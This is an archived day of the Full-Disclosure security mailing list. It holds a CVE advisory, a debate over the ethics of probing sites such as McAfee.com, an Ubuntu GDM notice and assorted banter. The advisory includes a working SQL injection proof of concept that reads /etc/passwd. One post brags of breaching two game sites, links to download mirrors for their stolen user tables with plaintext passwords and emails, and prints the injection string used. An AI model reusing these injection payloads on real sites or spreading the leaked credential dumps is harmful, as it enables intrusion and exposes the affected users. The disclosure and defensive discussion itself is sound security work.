asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for 
vulnerabilities for the sole purpose of exposing them.  They may say that they 
are doing it to ensure that the vendors fix 

[Full-disclosure] 'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)

2011-03-30 Thread Mark Stanislav
'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in a_viewusers.php allowing for SQL injection of the 's' 
query parameter.

 
II. TESTED VERSION
---
0.95.2


III. PoC EXPLOIT
---
http://www.example.com/aphpkb/a_viewusers.php?s=1%20UNION%20SELECT%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200


IV. SOLUTION
---
Upgrade to 0.95.3 or above.


V. REFERENCES
---
http://www.aphpkb.org/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1546
http://www.uncompiled.com/2011/03/cve-2011-1546/


VI. TIMELINE
---
03/13/2011 - Initial vendor disclosure
03/16/2011 - Vendor patched and released an updated version
03/16/2011 - Confirmed fix  disclosure date
03/30/2011 - Public disclosure
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread jabea
Quoting Cal Leeming c...@foxwhisper.co.uk:

 What this really comes down to... Is the product *worth* donating to? If it
 is, then donate. If it isn't, then don't. I can't personally comment either
 way as I haven't tried it.


I agree with you, but in order to test it you *must* donate. First  
time I see that.

Unless you email the authors, or are a FD's subcriber and have used  
Steven's mirror. (pre 2.5 was tagged free, now it's tagged There is  
no fixed price to get a copy).

I just mean, make a real licensing behind the tool if you want to sell  
it, or use a open licensing, but don't play with word in between.

Playing the donation way can be complex, if a user want a receipt for  
their donation, can they produce it ? (I don't know USA law, but where  
I live only a official non-profit organisation can receive a  
'donation'. Else it's simply considered a money gift). Their site  
advertise donation as 10, 50 and 100$, again, where I live you have  
the obligation to produce receipt for donation over 10$.

But my point is simply they just don't look professionnal, and I judge  
them that way because they try to sell the product, not like a GPL  
source code or a freeware.




-phil

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Nah, not from my POV anyway…   I’m not concerned with who is attacking whom 
from where – I just tend to say something when people claim to be “ethical 
hackers” but then say they are going to target a security company because they 
criticizing the group for targeting people.   It seems redundantly ironic.  Or 
would that be ironically redundant?
t

From: andrew.wallace [mailto:andrew.wall...@rocketmail.com]
Sent: Wednesday, March 30, 2011 1:10 PM
To: noloa...@gmail.com; n...@myproxylists.com; c...@foxwhisper.co.uk; 
pa...@ximen.es; m...@b3nji.com; Thor (Hammer of God); uuf6...@gmail.com; 
rdse...@mtu.edu
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

Guys,

Is it because these are Burmese hackers as to why everyone is getting in a 
pickle, e.g eastern hackers attacking western companies? I feel an Obama moment 
coming on, where he condemns the group known as YGN.

Andrew
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
I have that very strip printed and on the wall in my office :)You make 
several points, but the response that immediately comes to mind is that I 
actually see a difference between actively scanning content for 
structural/coding vulnerabilities, and entering data in a search box.  I don't 
know if there is any basis for this legally, but I feel that if you put a box 
up and I can search for something, then I can put whatever I want in that box.  
You (the royal you) are basically soliciting people to put data in the box.   
However, you are not asking anyone to spider your site or run scans against it. 
 

That said, my guess is that it would all come down to intent.  If I put ' or 
1=1-- (like the site I had that some camper sniped) in, it's a pretty sure bet 
that I'm looking for SQL injection.  But I don't know if the search box 
entitles me to do that.  It certainly is interesting list fodder though...  

-Original Message-
From: Ryan Sears [mailto:rdse...@mtu.edu]
Sent: Wednesday, March 30, 2011 12:30 PM
To: Thor (Hammer of God)
Cc: full-disclosure; noloa...@gmail.com
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com


How about the scenario in which one statically audit's some javascript sitting
on a site, to notice it does something in an unsafe manner, and can be used in
a XSS attack without actually making it happen?. There was no actual
'attacking' done, but there was still a vulnerability discovered. Is THAT
considered an illegal act? Is putting a '3' into a web form/comment section
considered attacking it if you look at the source to see how the character
translated? What if you just wanted to make an ascii heart? My point is it's a
very blurry line, and there are a lot of scenarios where one may discover a
vulnerability without even having to do anything.

As for the source code disclosures, there was absolutely no 'attacking' done.
This was a huge oversight in the site devs, and they were giving that
information to anyone who requested it, plain and simple. What about the
Tumblr incident that happened a while ago? Just because they screwed up a
production script, they ended up leaking massive amounts of internal
infrastructure details, as well as private API keys, and other stuff that 
could be
used for nefarious means. Is it illegal to visit that page? I think not, as 
THEY
were putting the information out there (albeit by accident), but I as a user
have no way to know that.

I understand what you're saying about them not asking people to look for
bugs, but it IS the internet. Companies don't typically ask external people to
audit their executables either, but people do it for a number of reasons
(mainly education).

If they leave their site up, people will potentially poke at it. That's just 
the way
it is. If I have a vested interest in a company (be it monetary or simply
supporting it's cause), I personally want to see the site flourish, because I 
am
then a part of that site. I want to make sure that my personal information is
protected, and if I do find a bug somewhere, I report it. I recently found a 
XSS
in OpenDNS's landing page, and they were very appreciative, very
professional, and prompt to respond. This made me WANT to work with them
further to ensure that their infrastructure was hardened to other forms of
attack as well. I don't disclose these sorts of issues publicly, because I 
give the
developers a chance to fix it, and in my past experience most companies are
happy that I reported an issue, because I could have just as easily not said
anything. If it does come down to it though, I follow my own public disclosure
policy (http://talesofacoldadmin.com/disclosure.html) based off Rain Forest
Puppy's. It basically just asks for somewhat consistent lines of communication
after I disclose something. If the communication drops (or is non-existent),
then it's at my own discretion to disclose it in a public forum.

I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if
choosing to disclose something (even in private) means potential legal
troubles, then that takes away the motivation for me to disclose it in any
form. I'm still going to be finding bugs for my own educational purposes, but
I'll just stop disclosing them. That in itself starts to undermine the 
internet as a
whole, leading to the restriction of information exchange, which is appalling.

It IS technically illegal to do these sorts of tests without consent, but at 
what
point DOES it become a 'test'? There's some cases, granted, in which the
intention is clear (testing for blind SQL injections, etc) as they leave a huge
footprint, but there's no explicitly clear line in which it becomes illegal. Is
adding a ' to my name illegal? What if my 70+ year old grandmother did it by
accident? Could she be persecuted as well? You can't apply the law to only
some situations and not others.

I also point you to one of my favorite XKCD's = http://xkcd.com/327/

Is naming your kid 

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Jeffrey Walton
On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
 I have that very strip printed and on the wall in my office :)    You make 
 several points, but the response that immediately comes to mind is that I 
 actually see a difference between actively scanning content for 
 structural/coding vulnerabilities, and entering data in a search box.  I 
 don't know if there is any basis for this legally, but I feel that if you put 
 a box up and I can search for something, then I can put whatever I want in 
 that box.  You (the royal you) are basically soliciting people to put data in 
 the box.   However, you are not asking anyone to spider your site or run 
 scans against it.

If a person or company places a host on the public internet and offers
a service, I don't think its reasonable to claim some input is fair
and other input is unfair. Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' is cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears
Agreed, If you put your site on the open internet, you have to take into 
account the inherent hostilities that go along with that action. 

A security firm like Mcafee /knows/ about these vulnerabilities. Guaranteed. If 
they offer services to make other's sites 'hacker proof', their first order of 
business should make sure that their infrastructure doesn't have blatantly 
obvious security holes. I'm not saying that they should catch EVERYTHING, but 
these are bugs that an automated scanner could easily pick up. I do understand 
that  a large infrastructure like theirs has pages that have been created by 
people with varying degrees of competence, but that's why they need to do 
inclusive penetration tests of their own network. At the very least they need 
to have some mechanism in place to detect (and possibly defer) these sorts of 
attacks. 

The way I see it, when a company hides behind legal threats to deter people 
from finding and reporting bugs, all they're doing is hurting themselves. Look 
at how Microsoft has turned around. 10 years ago they weren't dealing with 
people reporting issues in the right way, but they soon came to realize that by 
listening to the hackers that ARE coming forward with issues, they not only 
help themselves, but help the community as well. It's a win/win scenario for 
EVERYONE. 

You can tell a vast amount about how an infrastructure is run from just a bit 
of poking. If there are blatant security holes everywhere, then they clearly 
don't take security seriously. If they filter for SQL injections in javascript, 
then the dev's have no clue what they're actually trying to do. If you see SQL 
errors, chances are there are more serious issues to boot. I usually limit my 
poking to the very basic of basics when I do use a new service, and the more 
transparent they are (think reddit) the more I trust them. They even have a 
full subreddit devoted to finding and learning about XSS attacks. One word, 
awesome. 

Simply put, in my opinion you can't blame a pen-tester for looking for bugs in 
a site. The only time it should be considered malicious is when it's used in a 
malicious way. If I find a XSS in a webform, and I report it along with 
re-mediation suggestions I feel as though I'm doing the site a favor. It's 
unfortunate to think that some see this as a criminal activity. 

Ryan

- Original Message -
From: Jeffrey Walton noloa...@gmail.com
To: Thor (Hammer of God) t...@hammerofgod.com
Cc: Ryan Sears rdse...@mtu.edu, full-disclosure 
full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 5:28:59 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
 I have that very strip printed and on the wall in my office :)    You make 
 several points, but the response that immediately comes to mind is that I 
 actually see a difference between actively scanning content for 
 structural/coding vulnerabilities, and entering data in a search box.  I 
 don't know if there is any basis for this legally, but I feel that if you put 
 a box up and I can search for something, then I can put whatever I want in 
 that box.  You (the royal you) are basically soliciting people to put data in 
 the box.   However, you are not asking anyone to spider your site or run 
 scans against it.

If a person or company places a host on the public internet and offers
a service, I don't think its reasonable to claim some input is fair
and other input is unfair. Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' is cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] bcwars.com pokerrpg.com hacked 200k Email and Plain text passwords

2011-03-30 Thread Bob Smith
Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

bcwars
http://bit.ly/hD6bEE
http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip
http://www.megaupload.com/?d=P4B30IVR
http://depositfiles.com/de/files/u7unbc4vk
http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html
http://www.zshare.net/download/884416713e3e2044/
http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/

pokerrpg
http://bit.ly/hgCGJx
http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip
http://www.megaupload.com/?d=T41NF4SV
http://depositfiles.com/de/files/8qgnt9gll
http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html
http://www.zshare.net/download/88441668eff79c3a/
http://uploading.com/files/542e651f/tblUsers.sql-poker.zip

injection was
http://bcwars.com/forum/category/-3' union select
concat(id,'',username,':::',password,':::',email) from
tblUsers-- -

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Graham Gower
On 30 March 2011 21:53, Peter Osterberg j...@vel.nu wrote:
 Risk would be a lot higher than 10 percent if it was, say, 300 years since 
 the last tsunami

Time to go back to school. Or, perhaps you'd like to come play at my casino...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
Thanks for all your inputs and discussions.

We believe keeping these information as secret is unethical and irresponsible.



For those who think/criticize we're unethical /illegal,

there is so-called Passive Scanning technique in security testing.

Passive scanning (a.k.a Passive Reconnaissance) is basically examining
web site work flows and its involved source codes for identifying
vulnerabilities without ever attacking the target itself.

Contrary to what most of people think, passive scanning allows
everyone to audit any web sites without breaking the laws and without
alarming firewalls in-front.

Basically it starts as:

1. Do Google Hacking and look for potential information leakage. (Most
of the tools allow you to add your own GH Dorks).

2. Browse the target web site with a scanner that has passive
vulnerability scanning capability -  ratproxy, zaproxy, webscarab,
fiddler+watcher,/ burp-pro or you name it
Also use meta data extraction tools. And look for potential
information leakage  others

3. Examine all contents of JavaScript  decompiled Flash/Silverlight/Java Applet

4. Look for common vulnerable points and mis-uses
e.g., for JS files, examine calls like document.URLUnencoded,
document.referer, document.location, window.location,
location.href,document.URL ...etc


Passive scan is just a small subset of assessment realm. Findings are
very limited.

Our recent disclosure of Plesk open redirect flaw was a result from
purely passive scan on a static HTML web site -
http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [USN-1099-1] GDM vulnerability

2011-03-30 Thread Steve Beattie
===
Ubuntu Security Notice USN-1099-1March 30, 2011
gdm vulnerability
CVE-2011-0727
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  gdm 2.28.1-0ubuntu2.3

Ubuntu 10.04 LTS:
  gdm 2.30.2.is.2.30.0-0ubuntu5.1

Ubuntu 10.10:
  gdm 2.30.5-0ubuntu4.1

After a standard system update you need to log out all desktop sessions
and restart GDM to make all the necessary changes.

Details follow:

Sebastian Krahmer discovered that GDM (GNOME Display Manager) did not
properly drop privileges when handling the cache directories used
to store users' dmrc and face icon files. This could allow a local
attacker to change the ownership of arbitrary files, thereby gaining
root privileges.


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3.diff.gz
  Size/MD5:   769588 17bc09f417591f1913940d47cec9cc35
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3.dsc
  Size/MD5: 2168 09c46d7f6f577daa95f47643025ea67c
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1.orig.tar.gz
  Size/MD5:  3661916 b8f101394aa73e4505bad4ed4f0a695c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_amd64.deb
  Size/MD5:   731002 0e00de9426edb0a1dd9cd74d86251548

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_i386.deb
  Size/MD5:   672338 2e903d2e97356a7a7138f1da9c37c27a

  armel architecture (ARM Architecture):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_armel.deb
  Size/MD5:   662246 d6a5a00bc8e37ab1e8ab6faaec9efb42

  lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_lpia.deb
  Size/MD5:   669764 79d09e696d5ff527e86a263944cdf7db

  powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_powerpc.deb
  Size/MD5:   697456 eff967e0f0206a299f68e93b76f48d13

  sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_sparc.deb
  Size/MD5:   681890 23eec0f66ceb24635f86e3e4f3d06ade

Updated packages for Ubuntu 10.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1.diff.gz
  Size/MD5:   795064 e314a75da58ead79bd79cac83730c057

http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1.dsc
  Size/MD5: 2223 ea497892c7cc53f86ea3769c78e75962

http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0.orig.tar.gz
  Size/MD5:  3725698 583f6e50936f085be268e8543905fb74

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_amd64.deb
  Size/MD5:   798524 1e7b5dee40db568fcafa7d5f8c085c65

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_i386.deb
  Size/MD5:   734446 1de50ebe2d1a869a3cc2a4ffb7136de9

  armel architecture (ARM Architecture):


http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_armel.deb
  Size/MD5:   725942 f443a1c4098e116c293ebd9bc153f661

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_powerpc.deb
  Size/MD5:   760048 30592a26d7d20bc8b70d24543baf6182

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_sparc.deb
  Size/MD5:   753996 be562ec975b051a5e6909b394fc5cbc7

Updated packages for Ubuntu 10.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1.debian.tar.gz
  Size/MD5:   112891 a3aee3567a60f658b826668807c4dc6e
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1.dsc
  Size/MD5: 2187 07a449c1f9b1b1b393b92608f019cfd8
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5.orig.tar.gz
  Size/MD5:  3784180 9d200a16d6bbab0ac41b93b9dbe6d508

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1_amd64.deb
  Size/MD5:   808788 c88e512ff6c1d9b0afe2553bca3aaa0c

  i386 architecture (x86 compatible Intel/AMD):



Re: [Full-disclosure] SSL Capable NetCat and more

2011-03-30 Thread Randal T. Rioux
On 3/27/2011 4:29 PM, Dan Tulovsky wrote:
 Beside that, scnc is written in pure-Perl, and is easily modifiable
 by anyone. Such really simple (dumb?) stuff should not be written in
 low-level languages such as C.
 
 You can't be serious...

Shirley, he is.

Perl is shite. It's a dependency hell, it lacks the logic of C/C++ and
is interpreted (as pointed out by others). Any code base can be
modifiable by anyone - as long as it is open sourced.

Don't get me wrong, I'm not criticizing the product. I think reinventing
the wheel in lesser performing methods is great. Just don't disregard C.
To be honest, in my code auditing days, it was SO much easier to find
flaws in C/C++ than Perl, because Perl is just messy and ugly. Something
looks wrong, but it's right. Uggh!

But if you need to write something quick for an easy task, by all means,
hit the Perl.

It's like using Java to write large scale enterprise products. Who the
hell? Why? Portability is nice, but performance is better. Java belongs
in the small-scale realm of applications.

Grumble grumble. Get off my lawn. Back to the lair :-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Your email message was blocked

2011-03-30 Thread Randal T. Rioux
On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote:
 The following email message was *blocked* by Bell Aliant Content
 Filtering Device:
   
*From:*  ra...@procyonlabs.com
*To:*peter.mo...@bellaliant.ca
*Subject:*   Re: [Full-disclosure] SSL Capable NetCat and more
*Message:*   B4d93f5990001.0001.0003.mml
 
 Because it may contain *unacceptable language*, or *inappropriate
 material*.  Please remove any unacceptable or inappropriate language and
 resend the message.
 
 The blocked email will be automatically deleted after *5 days.
 *
 Content Rule: Policy Management (Inbound) : Block Common  Mild Profanity
 
 r...@bellaliant.ca
 

F**K YOU.

Here's a nickel - get yourself a real mail server.

Randy

-- 
Disclaimer:

By sending an email to ANY of my addresses you are agreeing that:

1. I am, by definition, the intended recipient
2. All information in the email is mine to do with as I see fit
3. I will take the contents as representing the views of your company
4. If your email is an Out of Office reply on a mailing list, I will
social engineer your company
5. This notification overrides any disclaimer or statement of
confidentiality that may be included on your message

Further, you understand that if any of the following conditions are met
that you are indeed, a bag of douche:

1. Your message identifies the device you sent it from
2. You messed up the thread by top-posting

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux
On 3/29/2011 9:13 PM, runlvl wrote:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while is still hot !
 
 Insect Pro 2.5 is a penetration security auditing and testing software
 solution designed to allow organizations of all sizes mitigate,
 monitor and manage the latest security threats vulnerabilities.
 
 We’re always working to improve Insect Pro and now the users obtain
 a new feature: A fully automated active web application security
 reconnaissance tool.
 
 Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
 
 We invite you to take a visual tour where you can find screenshots and
 videos, visit us now at http://www.insecurityresearch.com
 
 There is no fixed price to get a copy, you can obtain the full version
 by making a minimum donation to keep us coding.
 
 We are really thankful with the community!

I keep getting this error when trying to download:

Please enter an amount greater than zero.

Can you fix that so I can test out the software. I'm really curious
about how much code was lifted from other projects. Nice logo though!

Thanks,
Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux
On 3/29/2011 9:13 PM, runlvl wrote:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while is still hot !
snip

Oh! And you list the Dept. of Energy as a customer. I used to work
there, and still talk to a lot of the security offices for various
locations. They've never heard of it.

Also, did you get clearance from the DoE's Office of Public Affairs to
list them as a customer? They get touchy about that sort of stuff.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Peter Osterberg
I know what you are trying to say about, but I don't agree with your math if 
this is a cyclic event that has a 500 year cycle. Risk will increase the closer 
you get to when it's supposed to happen.

There are of course no such thing as cyclic events in a Casino. It's 
supposed.to be purely random. Unless you play rigged slot machines.
--
Skickat från min Android-telefon med K-9 E-post. Ursäkta min fåordighet.

Graham Gower graham.go...@gmail.com skrev:

On 30 March 2011 21:53, Peter Osterberg j...@vel.nu wrote:  Risk would be a 
lot higher than 10 percent if it was, say, 300 years since the last tsunami 
Time to go back to school. Or, perhaps you'd like to come play at my casino...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/